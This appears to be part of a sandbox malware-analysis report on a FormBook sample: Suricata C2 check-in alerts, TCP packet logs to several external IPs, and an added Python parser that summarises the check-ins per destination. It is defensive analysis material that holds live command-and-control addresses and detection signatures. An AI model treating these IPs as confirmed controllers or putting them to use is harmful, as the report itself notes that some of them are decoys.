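For an interpreter stub (a compiled AutoIt script, for instance) the import table is the interpreter's, so every capability the runtime exposes shows up as present whether or not the embedded script uses it; treat hits as an upper bound on the static surface and the absences as unproven until the decrypted payload is examined. The sandbox's behavioural signatures, not this table, are what tie the injection primitives to what actually ran.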
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-09-03T12:47:03.449238+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49751 | 80 | 192.168.2.4 | 162.0.239.141
2024-09-03T12:48:22.027549+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49767 | 80 | 192.168.2.4 | 3.33.130.190
2024-09-03T12:47:05.845810+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49752 | 80 | 192.168.2.4 | 162.0.239.141
2024-09-03T12:47:16.668340+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49755 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T12:46:24.686828+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49739 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T12:48:08.668881+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49763 | 80 | 192.168.2.4 | 161.97.168.245
2024-09-03T12:46:22.131705+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49738 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T12:48:11.402820+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49764 | 80 | 192.168.2.4 | 161.97.168.245
2024-09-03T12:48:25.385798+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49768 | 80 | 192.168.2.4 | 3.33.130.190
2024-09-03T12:46:36.128432+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49743 | 80 | 192.168.2.4 | 154.23.184.240
2024-09-03T12:46:19.589102+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49737 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T12:48:33.766377+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49770 | 80 | 192.168.2.4 | 218.247.68.184
2024-09-03T12:47:14.122963+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49754 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T12:48:19.457377+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49766 | 80 | 192.168.2.4 | 3.33.130.190
2024-09-03T12:47:39.022061+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49759 | 80 | 192.168.2.4 | 5.144.130.52
2024-09-03T12:47:41.568823+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49760 | 80 | 192.168.2.4 | 5.144.130.52
2024-09-03T12:48:06.104368+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49762 | 80 | 192.168.2.4 | 161.97.168.245
2024-09-03T12:47:36.459420+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49758 | 80 | 192.168.2.4 | 5.144.130.52
2024-09-03T12:47:00.593340+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49750 | 80 | 192.168.2.4 | 162.0.239.141
2024-09-03T12:46:33.583797+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49742 | 80 | 192.168.2.4 | 154.23.184.240
2024-09-03T12:48:36.350756+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49771 | 80 | 192.168.2.4 | 218.247.68.184
2024-09-03T12:47:19.220268+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49756 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T12:46:38.881573+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49744 | 80 | 192.168.2.4 | 154.23.184.240
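Parsing the alert rows above, as an added example that is not part of the report: in the scraped form the severity, port and IP columns run together into one digit string, so the parser recovers them from the only constraints the row offers (a Suricata priority of 1 to 4, one ephemeral port in each source/destination pair, and the analysis host's address as the boundary between the two IPs), then summarises check-ins per destination. The six embedded rows are copied from the table above; the parser and the summary are the editor's, and the analysis-host address 192.168.2.4 is taken from the table.

```python
"""Parse Joe Sandbox Suricata alert rows as scraped (columns run together)
and summarise the FormBook check-ins per destination IP. Added example; the
row format is the page's, the parser and the summary are the editor's."""
import re
from collections import defaultdict
from datetime import datetime

LOCAL_IP = "192.168.2.4"   # analysis VM address, from the table above

# Six rows copied from the alert table above (the full table has 23).
ALERT_ROWS = [
    "2024-09-03T12:47:03.449238+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975180192.168.2.4162.0.239.141",
    "2024-09-03T12:48:22.027549+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976780192.168.2.43.33.130.190",
    "2024-09-03T12:47:05.845810+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975280192.168.2.4162.0.239.141",
    "2024-09-03T12:47:16.668340+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975580192.168.2.4199.59.243.226",
    "2024-09-03T12:46:24.686828+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973980192.168.2.4199.59.243.226",
    "2024-09-03T12:48:08.668881+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976380192.168.2.4161.97.168.245",
]

_HEAD = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})"
                   r"(?P<proto>TCP|UDP|ICMP)(?P<sid>\d+)(?P<rest>.*)$")
_QUAD = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def _valid_port(s):
    """1..65535, written without a leading zero."""
    return s.isdigit() and not (len(s) > 1 and s[0] == "0") and 1 <= int(s) <= 65535


def split_ports(digits):
    """Split a fused port pair such as "4975180" into (49751, 80). The only
    disambiguation available is that one side must be an ephemeral port
    (>= 49152); reject the string unless that yields exactly one split."""
    cands = []
    for i in range(1, len(digits)):
        a, b = digits[:i], digits[i:]
        if _valid_port(a) and _valid_port(b) and max(int(a), int(b)) >= 49152:
            cands.append((int(a), int(b)))
    if len(cands) != 1:
        raise ValueError(f"ambiguous ports {digits!r}: {cands}")
    return cands[0]


def parse_alert(row, local_ip=LOCAL_IP):
    """Return one alert as a dict; raises ValueError if the row cannot be
    split unambiguously rather than guessing."""
    m = _HEAD.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row[:40]!r}")
    rest = m.group("rest")
    pos = rest.find(local_ip)          # the local IP separates "...ports" from the remote IP
    if pos < 0:
        raise ValueError("local IP not in row")
    remote = rest[pos + len(local_ip):]
    if not _QUAD.match(remote):
        raise ValueError(f"bad remote IP {remote!r}")
    # middle = "<signature><severity><sport><dport>"; the signature itself ends
    # in a digit ("M3"), so try every split of the trailing digit run.
    txt, digits = re.match(r"^(?P<txt>.*?)(?P<digits>\d+)$", rest[:pos]).groups()
    solutions = []
    for k in range(0, len(digits) - 2):    # k trailing-run digits belong to the signature
        sev = digits[k]
        if sev not in "1234":              # Suricata priority range
            continue
        try:
            sport, dport = split_ports(digits[k + 1:])
        except ValueError:
            continue
        solutions.append((txt + digits[:k], int(sev), sport, dport))
    if len(solutions) != 1:
        raise ValueError(f"cannot split {rest[:pos]!r} unambiguously: {solutions}")
    sig, sev, sport, dport = solutions[0]
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%f%z"),
        "proto": m.group("proto"), "sid": int(m.group("sid")),
        "signature": sig, "severity": sev,
        "src_ip": local_ip, "src_port": sport, "dst_ip": remote, "dst_port": dport,
    }


def summarize(rows, local_ip=LOCAL_IP):
    """Per destination IP: number of check-ins, first/last time, ports, SIDs."""
    by_dst = defaultdict(list)
    for row in rows:
        a = parse_alert(row, local_ip)
        by_dst[a["dst_ip"]].append(a)
    out = {}
    for ip, alerts in by_dst.items():
        alerts.sort(key=lambda a: a["ts"])
        out[ip] = {"checkins": len(alerts),
                   "first": alerts[0]["ts"], "last": alerts[-1]["ts"],
                   "ports": sorted({a["dst_port"] for a in alerts}),
                   "sids": sorted({a["sid"] for a in alerts})}
    return out


if __name__ == "__main__":
    for ip, s in sorted(summarize(ALERT_ROWS).items(), key=lambda kv: -kv[1]["checkins"]):
        print(f"{ip:16} {s['checkins']} check-ins  {s['first'].time()} .. {s['last'].time()}  ports={s['ports']}")
```

split_ports also handles the server-to-client rows of the TCP packet table, where 80 comes first and the client port second. What the summary shows for this sample is one client cycling through several destinations a few seconds apart with the same check-in signature; FormBook configurations carry decoy domains alongside the live controller, so the per-destination list is a set of candidates to block, not an identification of the controller.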
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 3, 2024 12:46:03.282625914 CEST | 49736 | 80 | 192.168.2.4 | 45.33.2.79
Sep 3, 2024 12:46:03.287559986 CEST | 80 | 49736 | 45.33.2.79 | 192.168.2.4
Sep 3, 2024 12:46:03.287651062 CEST | 49736 | 80 | 192.168.2.4 | 45.33.2.79
Sep 3, 2024 12:46:03.294533014 CEST | 49736 | 80 | 192.168.2.4 | 45.33.2.79
Sep 3, 2024 12:46:03.299559116 CEST | 80 | 49736 | 45.33.2.79 | 192.168.2.4
Sep 3, 2024 12:46:03.778975964 CEST | 80 | 49736 | 45.33.2.79 | 192.168.2.4
Sep 3, 2024 12:46:03.779367924 CEST | 80 | 49736 | 45.33.2.79 | 192.168.2.4
Sep 3, 2024 12:46:03.779378891 CEST | 80 | 49736 | 45.33.2.79 | 192.168.2.4
Sep 3, 2024 12:46:03.779580116 CEST | 49736 | 80 | 192.168.2.4 | 45.33.2.79
Sep 3, 2024 12:46:03.782857895 CEST | 49736 | 80 | 192.168.2.4 | 45.33.2.79
Sep 3, 2024 12:46:03.787590027 CEST | 80 | 49736 | 45.33.2.79 | 192.168.2.4
Sep 3, 2024 12:46:19.137413025 CEST | 49737 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:19.142226934 CEST | 80 | 49737 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:19.142314911 CEST | 49737 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:19.152934074 CEST | 49737 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:19.157728910 CEST | 80 | 49737 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:19.589030027 CEST | 80 | 49737 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:19.589055061 CEST | 80 | 49737 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:19.589066982 CEST | 80 | 49737 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:19.589102030 CEST | 49737 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:20.662336111 CEST | 49737 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:21.680881023 CEST | 49738 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:21.685749054 CEST | 80 | 49738 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:21.685862064 CEST | 49738 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:21.696630001 CEST | 49738 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:21.701564074 CEST | 80 | 49738 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:22.131633997 CEST | 80 | 49738 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:22.131647110 CEST | 80 | 49738 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:22.131705046 CEST | 49738 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:22.131743908 CEST | 80 | 49738 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:22.131791115 CEST | 49738 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:23.209119081 CEST | 49738 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:24.231967926 CEST | 49739 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:24.236912966 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.237010002 CEST | 49739 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:24.248466015 CEST | 49739 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:24.253427982 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253437996 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253500938 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253509998 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253541946 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253550053 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253557920 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.253637075 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.254528046 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.686636925 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.686778069 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.686788082 CEST | 80 | 49739 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:24.686827898 CEST | 49739 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:25.756103039 CEST | 49739 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:26.782568932 CEST | 49741 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:26.787389994 CEST | 80 | 49741 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:26.787467957 CEST | 49741 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:26.794883966 CEST | 49741 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:26.799745083 CEST | 80 | 49741 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:27.237807989 CEST | 80 | 49741 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:27.237822056 CEST | 80 | 49741 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:27.238123894 CEST | 80 | 49741 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:27.238157988 CEST | 49741 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:27.238178015 CEST | 49741 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:27.240897894 CEST | 49741 | 80 | 192.168.2.4 | 199.59.243.226
Sep 3, 2024 12:46:27.245649099 CEST | 80 | 49741 | 199.59.243.226 | 192.168.2.4
Sep 3, 2024 12:46:32.699393034 CEST | 49742 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:32.704324007 CEST | 80 | 49742 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:32.704458952 CEST | 49742 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:32.717315912 CEST | 49742 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:32.722150087 CEST | 80 | 49742 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:33.583709955 CEST | 80 | 49742 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:33.583734035 CEST | 80 | 49742 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:33.583796978 CEST | 49742 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:34.224879980 CEST | 49742 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:35.244087934 CEST | 49743 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:35.248948097 CEST | 80 | 49743 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:35.249020100 CEST | 49743 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:35.258577108 CEST | 49743 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:35.263495922 CEST | 80 | 49743 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:36.128294945 CEST | 80 | 49743 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:36.128374100 CEST | 80 | 49743 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:36.128432035 CEST | 49743 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:36.771780968 CEST | 49743 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:37.790643930 CEST | 49744 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:37.795552969 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.795655966 CEST | 49744 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:37.806225061 CEST | 49744 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:37.811248064 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.811285973 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.811294079 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.811300993 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.811332941 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.811764002 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.811772108 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.812236071 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:37.812243938 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:38.881063938 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:38.881514072 CEST | 80 | 49744 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:38.881572962 CEST | 49744 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:39.318547010 CEST | 49744 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:40.336718082 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:40.341698885 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:40.341804028 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:40.347528934 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:40.352569103 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:41.453099012 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:41.453125000 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:41.453133106 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:41.453140974 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:46:41.453242064 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:41.453265905 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:41.455884933 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:41.455884933 CEST | 49745 | 80 | 192.168.2.4 | 154.23.184.240
Sep 3, 2024 12:46:41.690156937 CEST | 80 | 49745 | 154.23.184.240 | 192.168.2.4
Sep 3, 2024 12:47:00.027806997 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.032828093 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.032890081 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.048372030 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.053245068 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593050003 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593072891 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593085051 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593096972 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593115091 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593126059 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593137026 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593148947 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593339920 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.593370914 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.593441010 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.597002029 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.598174095 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.598186016 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.598197937 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.598206997 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.598222017 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.598467112 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:00.675333977 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.675347090 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.675358057 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.675369024 CEST | 80 | 49750 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:00.675438881 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:01.553236961 CEST | 49750 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:02.581443071 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:02.657713890 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:02.659024000 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:02.671083927 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:02.675870895 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449151993 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449193954 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449209929 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449220896 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449233055 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449238062 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.449244022 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449255943 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.449258089 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449278116 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449284077 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.449290037 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449302912 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.449321032 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.449340105 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.449915886 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456181049 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456199884 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456213951 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456221104 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.456258059 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.456614017 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456626892 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456640959 CEST | 80 | 49751 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:03.456680059 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:03.456698895 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:04.178015947 CEST | 49751 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.198950052 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.204056978 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.207823992 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.219326019 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.224314928 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224370003 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224379063 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224387884 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224395990 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224433899 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224452019 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224462032 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.224468946 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845719099 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845751047 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845762014 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845778942 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845788956 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845802069 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845809937 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
Sep 3, 2024 12:47:05.845813990 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845828056 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845837116 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845841885 CEST | 80 | 49752 | 162.0.239.141 | 192.168.2.4
Sep 3, 2024 12:47:05.845854044 CEST | 49752 | 80 | 192.168.2.4 | 162.0.239.141
